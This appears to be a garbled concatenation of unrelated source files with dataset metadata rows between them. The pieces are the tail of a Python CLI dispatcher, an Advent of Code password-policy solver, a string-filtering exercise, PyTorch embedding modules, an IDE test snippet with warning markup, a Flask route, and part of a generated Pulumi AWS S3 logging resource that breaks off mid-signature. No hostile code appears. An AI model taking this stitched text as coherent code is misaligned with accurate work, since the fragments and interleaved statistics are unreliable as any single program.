    cut = None
    for index, arg in enumerate(argv):
        if arg in commands or arg in aliases:
            cut = index
            break
    if cut is None:
        usage()
        # NOTE(review): os._exit skips atexit handlers and stream flushing —
        # presumably intentional here; confirm before changing to sys.exit.
        os._exit(0)
    # No global options are supported yet; parse anyway for error reporting.
    globaloptionparser = optparse.OptionParser()
    globaloptionparser.parse_args(argv[0:cut])
    # Dispatch to the named command with the remaining arguments.
    name = argv[cut]
    if name in commands:
        result = commands[name](argv[cut + 1:])
    else:
        result = aliases[name](argv[cut + 1:])
    # Flush, in case output is rerouted to a file.
    console_flush()
    return result
if __name__ == "__main__":
    # Run the CLI; a non-None result from main() becomes the process
    # exit status.
    ret = main(sys.argv)
    if ret is not None:
        sys.exit(ret)
| 74.523039
| 59,849
| 0.664884
| 21,505
| 119,684
| 3.659707
| 0.04585
| 0.711901
| 1.054814
| 1.389037
| 0.72974
| 0.701621
| 0.688839
| 0.681914
| 0.670911
| 0.665828
| 0
| 0.236253
| 0.1614
| 119,684
| 1,605
| 59,850
| 74.56947
| 0.547889
| 0.046506
| 0
| 0.375723
| 0
| 0.004955
| 0.603979
| 0.563992
| 0
| 1
| 0
| 0.000623
| 0.001652
| 1
| 0.065235
| false
| 0.007432
| 0.032205
| 0.002477
| 0.151941
| 0.10322
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
90e844bc8b74ebc75eebf80641615c08f5f4b118
| 878
|
py
|
Python
|
day2AB.py
|
jjayala1/adventofCode2020
|
d5587fd812368d2ff24f215d904ddf258dd0a4a8
|
[
"MIT"
] | null | null | null |
day2AB.py
|
jjayala1/adventofCode2020
|
d5587fd812368d2ff24f215d904ddf258dd0a4a8
|
[
"MIT"
] | null | null | null |
day2AB.py
|
jjayala1/adventofCode2020
|
d5587fd812368d2ff24f215d904ddf258dd0a4a8
|
[
"MIT"
] | null | null | null |
# Part 1: a password is valid when the policy letter occurs between
# `lo` and `hi` times (inclusive).
valid = 0
with open('day2.txt', 'r') as f:
    for line in f:
        # Each line looks like "1-3 a: abcde".
        policy, letter, password = line.split()
        lo, hi = policy.split('-')  # avoid shadowing builtins min/max
        letter = letter.split(':')[0]  # strip the trailing ':'
        if letter in password:
            if int(lo) <= password.count(letter) <= int(hi):
                valid += 1
print(f'Valid passwords {valid}')
# Part 2: exactly one of the two 1-indexed positions must contain the
# policy letter.
valid = 0
with open('day2.txt', 'r') as f:
    for line in f:
        # Each line looks like "1-3 a: abcde".
        policy, letter, password = line.split()
        first, second = (int(p) for p in policy.split('-'))  # avoid shadowing min/max
        letter = letter.split(':')[0]  # strip the trailing ':'
        if letter in password:
            # "exactly one position matches" is an XOR, expressed as !=
            if (password[first - 1] == letter) != (password[second - 1] == letter):
                valid += 1
print(f'Valid passwords {valid}')
| 22.512821
| 130
| 0.534169
| 126
| 878
| 3.722222
| 0.222222
| 0.063966
| 0.03838
| 0.051173
| 0.869936
| 0.869936
| 0.869936
| 0.869936
| 0.869936
| 0.541578
| 0
| 0.021341
| 0.252847
| 878
| 38
| 131
| 23.105263
| 0.693598
| 0.150342
| 0
| 0.833333
| 0
| 0
| 0.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
295eefe6eb622fb45dea9f2046580257a14c03a8
| 1,856
|
py
|
Python
|
Module1/Day13/module1_day13_continueBreak.py
|
sydneybeal/100DaysPython
|
d1b004bd27a0644983f3af100172f394ee039f30
|
[
"MIT"
] | 2
|
2019-06-02T12:17:18.000Z
|
2019-07-12T16:55:55.000Z
|
Module1/Day13/module1_day13_continueBreak.py
|
sydneybeal/100DaysPython
|
d1b004bd27a0644983f3af100172f394ee039f30
|
[
"MIT"
] | null | null | null |
Module1/Day13/module1_day13_continueBreak.py
|
sydneybeal/100DaysPython
|
d1b004bd27a0644983f3af100172f394ee039f30
|
[
"MIT"
] | null | null | null |
"""
Author: <REPLACE>
Project: 100DaysPython
File: module1_day13_continueBreak.py
Creation Date: <REPLACE>
Description: <REPLACE>
"""
# Keep only the consonants of the motivational speech.
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
             "Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
             "Who's with me? Let's go!"
CONSONANTS = 'bcdfghjklmnpqrstvwxyz'
output = "".join(ch for ch in motivation if ch.lower() in CONSONANTS)
print(output)
# Same consonant filter, demonstrating `continue`: skip every character
# that is not a consonant and accumulate the rest.
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
             "Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
             "Who's with me? Let's go!"
output = ""
for ch in motivation:
    if ch.lower() not in 'bcdfghjklmnpqrstvwxyz':
        continue
    output += ch
print(output)
# Demonstrates `break`: accumulate letters only until the first
# non-alphabetic character ends the loop (the '?' right after "Over").
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
             "Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
             "Who's with me? Let's go!"
output = ""
for ch in motivation:
    if ch.lower() not in 'abcdefghijklmnopqrstuvwxyz':
        break
    output += ch
print(output)
# Consonant filter once more, this time with filter() instead of an
# explicit loop.
motivation = "Over? Did you say 'over'? Nothing is over until we decide it is! Was it over when the Germans bombed " \
             "Pearl Harbor? Hell no! And it ain't over now. 'Cause when the goin' gets tough...the tough get goin'! " \
             "Who's with me? Let's go!"
output = "".join(filter(lambda ch: ch.lower() in 'bcdfghjklmnpqrstvwxyz', motivation))
print(output)
| 36.392157
| 119
| 0.633621
| 267
| 1,856
| 4.397004
| 0.224719
| 0.0477
| 0.057922
| 0.068143
| 0.841567
| 0.841567
| 0.841567
| 0.841567
| 0.841567
| 0.841567
| 0
| 0.004386
| 0.262931
| 1,856
| 50
| 120
| 37.12
| 0.853801
| 0.082974
| 0
| 0.888889
| 0
| 0.222222
| 0.595935
| 0.053198
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
297cbc8c5ae5327359e872ec6a41a2c56887f5a0
| 154
|
py
|
Python
|
b3book/__init__.py
|
efbrasil/b3book
|
27cf6cb4527adba532010ebf1213132a99365932
|
[
"MIT"
] | null | null | null |
b3book/__init__.py
|
efbrasil/b3book
|
27cf6cb4527adba532010ebf1213132a99365932
|
[
"MIT"
] | null | null | null |
b3book/__init__.py
|
efbrasil/b3book
|
27cf6cb4527adba532010ebf1213132a99365932
|
[
"MIT"
] | null | null | null |
# from .data_classes import DBOrder, B3Order
# from .functions import read_orders_from_plain_files
from .lob import LOB
from .functions import plot_book
| 25.666667
| 53
| 0.824675
| 23
| 154
| 5.26087
| 0.608696
| 0.214876
| 0.31405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.12987
| 154
| 5
| 54
| 30.8
| 0.895522
| 0.61039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
297db9c207342bf45ca08cd87808389d0abd0c48
| 1,863
|
py
|
Python
|
modules/info_embedding.py
|
aliang-rec/Code-for-MAMO
|
fb488e885d3a0cfe510d31ca714117e02aa66c4e
|
[
"Apache-2.0"
] | null | null | null |
modules/info_embedding.py
|
aliang-rec/Code-for-MAMO
|
fb488e885d3a0cfe510d31ca714117e02aa66c4e
|
[
"Apache-2.0"
] | null | null | null |
modules/info_embedding.py
|
aliang-rec/Code-for-MAMO
|
fb488e885d3a0cfe510d31ca714117e02aa66c4e
|
[
"Apache-2.0"
] | null | null | null |
from utils import *
# ======================Embedding=========================
# item embedding
class ItemEmbedding(torch.nn.Module):
    """Embed raw item features into an `embedding_dim`-sized vector.

    The body is `n_layer - 1` linear layers (the first maps the input
    down to half its width, the rest keep that width) followed by a
    single activation, then a final linear projection with its own
    activation.
    """

    def __init__(self, n_layer, in_dim, embedding_dim, activation='sigmoid'):
        super().__init__()
        self.input_size = in_dim
        half_width = int(self.input_size / 2)
        width = self.input_size
        stack = []
        for _ in range(n_layer - 1):
            layer = torch.nn.Linear(width, half_width)
            layer.bias.data.fill_(0.0)  # zero-initialize biases
            stack.append(layer)
            width = half_width
        # NOTE: one activation follows the whole linear stack, not one
        # per layer — this mirrors the original design.
        stack.append(activation_func(activation))
        self.fc = torch.nn.Sequential(*stack)
        self.final_layer = torch.nn.Sequential(
            torch.nn.Linear(width, embedding_dim),
            activation_func(activation),
        )

    def forward(self, x):
        hidden = self.fc(x)
        return self.final_layer(hidden)
# user embedding
class UserEmbedding(torch.nn.Module):
    """Embed raw user features into an `embedding_dim`-sized vector.

    Structure: `n_layer - 1` fully-connected layers (input halved once,
    then constant width), one activation after the stack, and a final
    linear projection followed by its own activation.
    """

    def __init__(self, n_layer, in_dim, embedding_dim, activation='sigmoid'):
        super().__init__()
        self.input_size = in_dim
        hidden_width = int(self.input_size / 2)
        current = self.input_size
        blocks = []
        for _ in range(n_layer - 1):  # fully-connected layers
            fc_layer = torch.nn.Linear(current, hidden_width)
            fc_layer.bias.data.fill_(0.0)  # zero-initialize biases
            blocks.append(fc_layer)
            current = hidden_width
        blocks.append(activation_func(activation))
        self.fc = torch.nn.Sequential(*blocks)
        self.final_layer = torch.nn.Sequential(
            torch.nn.Linear(current, embedding_dim),
            activation_func(activation),
        )

    def forward(self, x):
        hidden = self.fc(x)
        return self.final_layer(hidden)
| 31.576271
| 89
| 0.596887
| 235
| 1,863
| 4.459574
| 0.212766
| 0.066794
| 0.074427
| 0.064886
| 0.889313
| 0.889313
| 0.889313
| 0.889313
| 0.889313
| 0.889313
| 0
| 0.005908
| 0.273215
| 1,863
| 58
| 90
| 32.12069
| 0.768095
| 0.048846
| 0
| 0.878049
| 0
| 0
| 0.007923
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.02439
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4621cf9ca941e0d9c8e2b3306844bb8f20efaa75
| 279
|
py
|
Python
|
python/testData/inspections/PyTypeCheckerInspection/MapArgumentsInOppositeOrderPy3.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2018-12-29T09:53:39.000Z
|
2018-12-29T09:53:42.000Z
|
python/testData/inspections/PyTypeCheckerInspection/MapArgumentsInOppositeOrderPy3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyTypeCheckerInspection/MapArgumentsInOppositeOrderPy3.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
map(<weak_warning descr="Expected type '(Any) -> Any' (matched generic type '(_T1) -> _S'), got 'str' instead">'foo'</weak_warning>, <weak_warning descr="Expected type 'Iterable' (matched generic type 'Iterable[_T1]'), got '(c: Any) -> int' instead">lambda c: 42</weak_warning>)
| 139.5
| 278
| 0.691756
| 40
| 279
| 4.65
| 0.5
| 0.236559
| 0.172043
| 0.258065
| 0.301075
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016129
| 0.111111
| 279
| 1
| 279
| 279
| 0.733871
| 0
| 0
| 0
| 0
| 2
| 0.648746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4661b0d7639649e58c11a200d32e25c4cd348f53
| 140
|
py
|
Python
|
flask/app/info/routes.py
|
BlackAndWhiteData/Dash_Course
|
3a45f20c75416b6e4403094221e6c2171a5f00de
|
[
"MIT"
] | null | null | null |
flask/app/info/routes.py
|
BlackAndWhiteData/Dash_Course
|
3a45f20c75416b6e4403094221e6c2171a5f00de
|
[
"MIT"
] | null | null | null |
flask/app/info/routes.py
|
BlackAndWhiteData/Dash_Course
|
3a45f20c75416b6e4403094221e6c2171a5f00de
|
[
"MIT"
] | null | null | null |
from . import blueprint
from flask import render_template
@blueprint.route('/')
def index():
    """Render the landing page for the info blueprint."""
    template_name = 'index_info.html'
    return render_template(template_name)
| 20
| 45
| 0.757143
| 18
| 140
| 5.722222
| 0.666667
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 140
| 7
| 45
| 20
| 0.844262
| 0
| 0
| 0
| 0
| 0
| 0.113475
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0.4
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d3b9474e0c23d2944af86fa88de5b88952854ce1
| 180
|
py
|
Python
|
py/pyglass/pyglass/sketch/__init__.py
|
bengsquared/manila
|
0cbb50781d925558508990b51ec5f78c6bee1972
|
[
"MIT"
] | 2
|
2015-01-02T07:15:07.000Z
|
2015-04-15T05:23:59.000Z
|
py/pyglass/pyglass/sketch/__init__.py
|
bengsquared/manila
|
0cbb50781d925558508990b51ec5f78c6bee1972
|
[
"MIT"
] | 2
|
2020-11-04T05:49:26.000Z
|
2021-03-13T21:05:36.000Z
|
py/pyglass/pyglass/sketch/__init__.py
|
bengsquared/manila
|
0cbb50781d925558508990b51ec5f78c6bee1972
|
[
"MIT"
] | 2
|
2020-11-03T00:48:06.000Z
|
2021-03-12T00:14:07.000Z
|
# -*- coding: utf-8 -*-
from .api import list_slices, list_artboards, list_pages
from .api import slices, artboards, pages
from .api import preview
from .api import is_sketchfile
| 25.714286
| 56
| 0.761111
| 27
| 180
| 4.925926
| 0.481481
| 0.210526
| 0.390977
| 0.270677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006494
| 0.144444
| 180
| 6
| 57
| 30
| 0.857143
| 0.116667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3108021821fbf654c2d58f3163dfc3b23216889e
| 17,543
|
py
|
Python
|
sdk/python/pulumi_aws/s3/bucket_logging_v2.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_logging_v2.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_logging_v2.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BucketLoggingV2Args', 'BucketLoggingV2']
@pulumi.input_type
class BucketLoggingV2Args:
    # Generated by the Pulumi Terraform Bridge (tfgen); regenerate from the
    # provider schema rather than editing by hand.
    def __init__(__self__, *,
                 bucket: pulumi.Input[str],
                 target_bucket: pulumi.Input[str],
                 target_prefix: pulumi.Input[str],
                 expected_bucket_owner: Optional[pulumi.Input[str]] = None,
                 target_grants: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]] = None):
        """
        The set of arguments for constructing a BucketLoggingV2 resource.
        :param pulumi.Input[str] bucket: The name of the bucket.
        :param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
        :param pulumi.Input[str] target_prefix: A prefix for all log object keys.
        :param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
        :param pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]] target_grants: Set of configuration blocks with information for granting permissions documented below.
        """
        # Required arguments are always set; optional ones only when provided.
        pulumi.set(__self__, "bucket", bucket)
        pulumi.set(__self__, "target_bucket", target_bucket)
        pulumi.set(__self__, "target_prefix", target_prefix)
        if expected_bucket_owner is not None:
            pulumi.set(__self__, "expected_bucket_owner", expected_bucket_owner)
        if target_grants is not None:
            pulumi.set(__self__, "target_grants", target_grants)

    @property
    @pulumi.getter
    def bucket(self) -> pulumi.Input[str]:
        """
        The name of the bucket.
        """
        return pulumi.get(self, "bucket")

    @bucket.setter
    def bucket(self, value: pulumi.Input[str]):
        pulumi.set(self, "bucket", value)

    @property
    @pulumi.getter(name="targetBucket")
    def target_bucket(self) -> pulumi.Input[str]:
        """
        The bucket where you want Amazon S3 to store server access logs.
        """
        return pulumi.get(self, "target_bucket")

    @target_bucket.setter
    def target_bucket(self, value: pulumi.Input[str]):
        pulumi.set(self, "target_bucket", value)

    @property
    @pulumi.getter(name="targetPrefix")
    def target_prefix(self) -> pulumi.Input[str]:
        """
        A prefix for all log object keys.
        """
        return pulumi.get(self, "target_prefix")

    @target_prefix.setter
    def target_prefix(self, value: pulumi.Input[str]):
        pulumi.set(self, "target_prefix", value)

    @property
    @pulumi.getter(name="expectedBucketOwner")
    def expected_bucket_owner(self) -> Optional[pulumi.Input[str]]:
        """
        The account ID of the expected bucket owner.
        """
        return pulumi.get(self, "expected_bucket_owner")

    @expected_bucket_owner.setter
    def expected_bucket_owner(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_bucket_owner", value)

    @property
    @pulumi.getter(name="targetGrants")
    def target_grants(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]:
        """
        Set of configuration blocks with information for granting permissions documented below.
        """
        return pulumi.get(self, "target_grants")

    @target_grants.setter
    def target_grants(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]):
        pulumi.set(self, "target_grants", value)
@pulumi.input_type
class _BucketLoggingV2State:
    # Generated by the Pulumi Terraform Bridge (tfgen); regenerate from the
    # provider schema rather than editing by hand.
    def __init__(__self__, *,
                 bucket: Optional[pulumi.Input[str]] = None,
                 expected_bucket_owner: Optional[pulumi.Input[str]] = None,
                 target_bucket: Optional[pulumi.Input[str]] = None,
                 target_grants: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]] = None,
                 target_prefix: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering BucketLoggingV2 resources.
        :param pulumi.Input[str] bucket: The name of the bucket.
        :param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
        :param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
        :param pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]] target_grants: Set of configuration blocks with information for granting permissions documented below.
        :param pulumi.Input[str] target_prefix: A prefix for all log object keys.
        """
        # Every state field is optional; only the provided ones are stored.
        if bucket is not None:
            pulumi.set(__self__, "bucket", bucket)
        if expected_bucket_owner is not None:
            pulumi.set(__self__, "expected_bucket_owner", expected_bucket_owner)
        if target_bucket is not None:
            pulumi.set(__self__, "target_bucket", target_bucket)
        if target_grants is not None:
            pulumi.set(__self__, "target_grants", target_grants)
        if target_prefix is not None:
            pulumi.set(__self__, "target_prefix", target_prefix)

    @property
    @pulumi.getter
    def bucket(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the bucket.
        """
        return pulumi.get(self, "bucket")

    @bucket.setter
    def bucket(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "bucket", value)

    @property
    @pulumi.getter(name="expectedBucketOwner")
    def expected_bucket_owner(self) -> Optional[pulumi.Input[str]]:
        """
        The account ID of the expected bucket owner.
        """
        return pulumi.get(self, "expected_bucket_owner")

    @expected_bucket_owner.setter
    def expected_bucket_owner(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "expected_bucket_owner", value)

    @property
    @pulumi.getter(name="targetBucket")
    def target_bucket(self) -> Optional[pulumi.Input[str]]:
        """
        The bucket where you want Amazon S3 to store server access logs.
        """
        return pulumi.get(self, "target_bucket")

    @target_bucket.setter
    def target_bucket(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_bucket", value)

    @property
    @pulumi.getter(name="targetGrants")
    def target_grants(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]:
        """
        Set of configuration blocks with information for granting permissions documented below.
        """
        return pulumi.get(self, "target_grants")

    @target_grants.setter
    def target_grants(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]):
        pulumi.set(self, "target_grants", value)

    @property
    @pulumi.getter(name="targetPrefix")
    def target_prefix(self) -> Optional[pulumi.Input[str]]:
        """
        A prefix for all log object keys.
        """
        return pulumi.get(self, "target_prefix")

    @target_prefix.setter
    def target_prefix(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_prefix", value)
class BucketLoggingV2(pulumi.CustomResource):
    # Generated by the Pulumi Terraform Bridge (tfgen); regenerate from the
    # provider schema rather than editing by hand.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 bucket: Optional[pulumi.Input[str]] = None,
                 expected_bucket_owner: Optional[pulumi.Input[str]] = None,
                 target_bucket: Optional[pulumi.Input[str]] = None,
                 target_grants: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]]] = None,
                 target_prefix: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a S3 bucket logging resource.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_aws as aws

        example_bucket_v2 = aws.s3.BucketV2("exampleBucketV2")
        example_bucket_acl_v2 = aws.s3.BucketAclV2("exampleBucketAclV2",
            bucket=example_bucket_v2.id,
            acl="private")
        log_bucket = aws.s3.BucketV2("logBucket")
        log_bucket_acl = aws.s3.BucketAclV2("logBucketAcl",
            bucket=log_bucket.id,
            acl="log-delivery-write")
        example_bucket_logging_v2 = aws.s3.BucketLoggingV2("exampleBucketLoggingV2",
            bucket=example_bucket_v2.id,
            target_bucket=log_bucket.id,
            target_prefix="log/")
        ```

        ## Import

        S3 bucket logging can be imported using the `bucket` e.g.,

        ```sh
         $ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name
        ```

        In addition, S3 bucket logging can be imported using the `bucket` and `expected_bucket_owner` separated by a comma (`,`) e.g.,

        ```sh
         $ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name,123456789012
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] bucket: The name of the bucket.
        :param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
        :param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]] target_grants: Set of configuration blocks with information for granting permissions documented below.
        :param pulumi.Input[str] target_prefix: A prefix for all log object keys.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: BucketLoggingV2Args,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a S3 bucket logging resource.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_aws as aws

        example_bucket_v2 = aws.s3.BucketV2("exampleBucketV2")
        example_bucket_acl_v2 = aws.s3.BucketAclV2("exampleBucketAclV2",
            bucket=example_bucket_v2.id,
            acl="private")
        log_bucket = aws.s3.BucketV2("logBucket")
        log_bucket_acl = aws.s3.BucketAclV2("logBucketAcl",
            bucket=log_bucket.id,
            acl="log-delivery-write")
        example_bucket_logging_v2 = aws.s3.BucketLoggingV2("exampleBucketLoggingV2",
            bucket=example_bucket_v2.id,
            target_bucket=log_bucket.id,
            target_prefix="log/")
        ```

        ## Import

        S3 bucket logging can be imported using the `bucket` e.g.,

        ```sh
         $ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name
        ```

        In addition, S3 bucket logging can be imported using the `bucket` and `expected_bucket_owner` separated by a comma (`,`) e.g.,

        ```sh
         $ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name,123456789012
        ```

        :param str resource_name: The name of the resource.
        :param BucketLoggingV2Args args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Resolve which overload the caller used, then delegate to
        # _internal_init with keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(BucketLoggingV2Args, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       bucket: Optional[pulumi.Input[str]] = None,
                       expected_bucket_owner: Optional[pulumi.Input[str]] = None,
                       target_bucket: Optional[pulumi.Input[str]] = None,
                       target_grants: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]]] = None,
                       target_prefix: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared constructor body for both overloads: validates options,
        # checks required properties, and registers the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = BucketLoggingV2Args.__new__(BucketLoggingV2Args)

            # Required properties may be omitted only when looking up by URN.
            if bucket is None and not opts.urn:
                raise TypeError("Missing required property 'bucket'")
            __props__.__dict__["bucket"] = bucket
            __props__.__dict__["expected_bucket_owner"] = expected_bucket_owner
            if target_bucket is None and not opts.urn:
                raise TypeError("Missing required property 'target_bucket'")
            __props__.__dict__["target_bucket"] = target_bucket
            __props__.__dict__["target_grants"] = target_grants
            if target_prefix is None and not opts.urn:
                raise TypeError("Missing required property 'target_prefix'")
            __props__.__dict__["target_prefix"] = target_prefix
        super(BucketLoggingV2, __self__).__init__(
            'aws:s3/bucketLoggingV2:BucketLoggingV2',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            bucket: Optional[pulumi.Input[str]] = None,
            expected_bucket_owner: Optional[pulumi.Input[str]] = None,
            target_bucket: Optional[pulumi.Input[str]] = None,
            target_grants: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]]] = None,
            target_prefix: Optional[pulumi.Input[str]] = None) -> 'BucketLoggingV2':
